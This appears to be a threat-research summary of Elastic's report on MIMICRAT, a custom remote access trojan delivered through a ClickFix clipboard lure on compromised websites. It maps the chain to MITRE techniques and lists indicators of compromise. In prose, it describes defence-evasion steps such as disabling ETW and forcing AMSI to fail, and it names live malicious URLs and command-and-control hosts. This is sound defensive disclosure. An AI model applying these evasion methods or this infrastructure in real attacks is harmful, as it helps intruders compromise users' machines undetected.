Threat Research

MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites

Elastic.co
MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites

Elastic Security Labs discovered a multi-stage ClickFix campaign that compromises legitimate websites to deliver a five-stage chain culminating in a custom native RAT called MIMICRAT. The attack uses an obfuscated PowerShell downloader with ETW and AMSI bypass, a Lua-based in-memory loader and Meterpreter-like shellcode, and a C++ implant with token impersonation and SOCKS5 tunneling. #MIMICRAT #ClickFix

Keypoints

  • Attackers compromised multiple legitimate websites (bincheck.io and investonline.in) to host and deliver a ClickFix clipboard-based PowerShell lure that bypasses browser download protections.
  • The delivery chain is five stages: obfuscated PowerShell downloader → ETW/AMSI bypass and payload drop → Lua-based in-memory loader → Meterpreter-like shellcode → MIMICRAT native RAT.
  • Stage 2 implements runtime string construction and reflection-based patches to disable Event Tracing for Windows and AMSI, plus memory method-handle patching to evade detection.
  • The Lua loader decrypts and executes embedded shellcode fully in memory, avoiding disk-based artifacts; the shellcode matched Meterpreter signatures and loads MIMICRAT reflectively.
  • MIMICRAT is a bespoke MSVC x64 implant with malleable HTTP(S) C2 profiles, RC4/RSA/AES layered encryption, a 22-command dispatch table, token theft/impersonation, and SOCKS proxy support.
  • Infrastructure clusters include initial payload delivery servers (45.13.212.250/251), post-exploitation C2 (23.227.202.114/www.ndibstersoft[.]com), and a CloudFront relay (d15mawx0xveem1.cloudfront[.]net).

MITRE Techniques

  • [T1189 ] Drive-by Compromise – Compromised legitimate sites host malicious JavaScript used to deliver the ClickFix lure (‘compromising legitimate, trusted websites rather than attacker-owned infrastructure.’)
  • [T1204 ] User Execution – Victims are social-engineered to paste and run a PowerShell command copied to the clipboard (‘the lure copies a malicious PowerShell command directly to the victim’s clipboard and prompts them to open a Run dialog … and paste it.’)
  • [T1059.001 ] PowerShell – A compact obfuscated PowerShell one-liner and a second-stage PowerShell script are used as the primary downloader and evasion mechanism (‘The clipboard-delivered command is a compact and obfuscated PowerShell one-liner:’)
  • [T1027 ] Obfuscated Files or Information – Strings and domains are constructed at runtime and mixed-case obfuscation is used to hide cmdlet names and C2 addresses (‘string slicing and arithmetic index operations on a single seed string … avoiding any plaintext representation of the C2 domain or PowerShell cmdlet names in the initial payload.’)
  • [T1562.001 ] Impair Defenses: Disable or Modify Tools – The PowerShell script patches ETW and sets AMSI init to failed to disable logging and scanning (‘effectively disabling Event Tracing for Windows and blinding PowerShell script block logging.’; ‘sets the amsiInitFailed field to $true, causing PowerShell to skip all AMSI content scanning for the remainder of the session.’)
  • [T1059 ] Command and Scripting Interpreter (Lua) – A statically embedded Lua interpreter decrypts and executes a Lua script that decodes and runs shellcode in memory (‘The decoded shellcode is then allocated in executable memory via luaalloc, copied into that memory with luacpy, and finally executed via luaexe, achieving fully in-memory, fileless shellcode execution.’)
  • [T1055 ] Process Injection – The shellcode stage acts as a loader consistent with Meterpreter to reflectively load the final RAT into memory (‘Shellcode matched Meterpreter-related signatures, suggesting the shellcode stage is a loader consistent with the Meterpreter code-family to reflectively load MIMICRAT into memory.’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols – MIMICRAT communicates over HTTPS on port 443 using HTTP profiles that mimic legitimate analytics traffic (‘The final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic.’)
  • [T1041 ] Exfiltration Over C2 Channel – The implant uses HTTP POST profiles for data exfiltration (‘HTTP POST Profile: Data Exfiltration’)
  • [T1134.001 ] Access Token Manipulation: Token Impersonation/Theft – MIMICRAT implements token duplication and impersonation for privilege abuse and launching processes (‘Steal tokenDuplicates the security token of a target process by PID’; ‘Spawn processLaunches a process using a stolen token if available’)
  • [T1090 ] Proxy – The implant supports SOCKS proxy tunneling to route traffic through compromised hosts (‘SOCKS5 tunneling’ and command entries for SOCKS configuration and proxying)

Indicators of Compromise

  • [SHA-256 ] sample binaries and stages – a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b (MIMICRAT), bcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1 (Stage 1 PowerShell), and 2 more hashes
  • [IP Address ] delivery and C2 infrastructure – 45.13.212.250, 45.13.212.251 (payload delivery cluster), and 23.227.202.114 (post-exploitation C2)
  • [Domain ] C2 and relay hosts – d15mawx0xveem1.cloudfront[.]net (CloudFront C2 relay), xmri.network / xMRi.neTwOrk (stage 1 C2/payload delivery), and other associated domains (wexmri.cc, www.ndibstersoft[.]com)
  • [URL ] malicious script and payload archive – https://www.investonline[.]in/js/jq.php (hosted ClickFix JavaScript payload), backupdailyawss.s3.us-east-1.amazonaws[.]com/rgen.zip (payload delivery archive)
  • [File Name ] dropped artifacts – zbuild.exe (dropped binary / Lua loader), rgen.zip (embedded payload archive)

Read more: https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks